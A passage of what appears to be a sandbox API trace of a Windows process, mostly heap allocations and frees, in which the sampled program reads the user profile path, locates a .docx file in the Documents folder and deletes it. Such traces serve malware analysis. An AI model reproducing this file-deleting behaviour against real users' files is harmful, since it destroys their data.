hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.354] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0265.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0265.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0265.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0265.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0265.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0265.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0265.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0265.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0265.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0265.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cd8 [0265.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa230 [0265.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0265.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0265.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa200 [0265.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.355] CloseHandle (hObject=0x2d0) returned 1 [0265.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3561010 | out: hHeap=0x25c0000) returned 1 [0265.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0265.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0265.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0265.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.367] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0265.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0265.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0265.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0265.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0265.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0265.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0265.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0265.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0265.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0265.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0265.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0265.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0265.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0265.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0265.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0265.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0265.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0265.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0265.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0265.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0265.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0265.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0265.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0265.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0265.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0265.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0265.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0265.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0265.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0265.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0265.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0265.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0265.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0265.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0265.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0265.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0265.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0265.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0265.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0265.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0265.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0265.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0265.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0265.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3518fc0 | out: hHeap=0x25c0000) returned 1 [0265.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0265.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0265.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0265.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0265.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0265.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0265.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0265.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0265.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0265.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0265.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0265.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0265.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0265.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0265.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0265.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0265.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0265.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0265.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0265.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0265.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0265.379] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0265.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0265.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0265.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0265.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0265.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0265.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0265.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0265.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0265.380] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0265.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0265.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0265.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0265.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0265.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0265.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f90 [0265.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0265.380] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0265.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0265.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0265.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0265.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0265.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0265.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0265.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0265.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0265.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0265.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0265.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0265.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0265.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0265.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0265.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0265.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0265.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0265.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0265.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0265.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0265.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0265.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0265.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0265.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7a) returned 0x24f2068 [0265.382] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/MzqysNw1q1np8jj.docx", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MzqysNw1q1np8jj.docx", lpFilePart=0x8bedfc*="MzqysNw1q1np8jj.docx") returned 0x3c [0265.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f2068 | out: hHeap=0x25c0000) returned 1 [0265.383] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MzqysNw1q1np8jj.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mzqysnw1q1np8jj.docx")) returned 0x20 [0265.383] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MzqysNw1q1np8jj.docx", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1d8a540, ftCreationTime.dwHighDateTime=0x1d49d63, ftLastAccessTime.dwLowDateTime=0x61144ac0, ftLastAccessTime.dwHighDateTime=0x1d4d565, ftLastWriteTime.dwLowDateTime=0x61144ac0, ftLastWriteTime.dwHighDateTime=0x1d4d565, nFileSizeHigh=0x0, nFileSizeLow=0x14908, dwReserved0=0x1de3, dwReserved1=0x4, cFileName="MzqysNw1q1np8jj.docx", cAlternateFileName="MZQYSN~1.DOC")) returned 0xaa5760 [0265.383] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MzqysNw1q1np8jj.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mzqysnw1q1np8jj.docx")) returned 1 [0265.385] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1d8a540, ftCreationTime.dwHighDateTime=0x1d49d63, ftLastAccessTime.dwLowDateTime=0x61144ac0, ftLastAccessTime.dwHighDateTime=0x1d4d565, ftLastWriteTime.dwLowDateTime=0x61144ac0, ftLastWriteTime.dwHighDateTime=0x1d4d565, nFileSizeHigh=0x0, nFileSizeLow=0x14908, dwReserved0=0x1de3, dwReserved1=0x4, cFileName="MzqysNw1q1np8jj.docx", cAlternateFileName="MZQYSN~1.DOC")) returned 0 [0265.385] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0265.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0265.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0265.386] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0265.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0265.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0265.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0265.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0265.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0265.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0265.386] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0265.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0265.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0265.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f90 [0265.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0265.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0265.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0265.387] RtlAllocateHeap 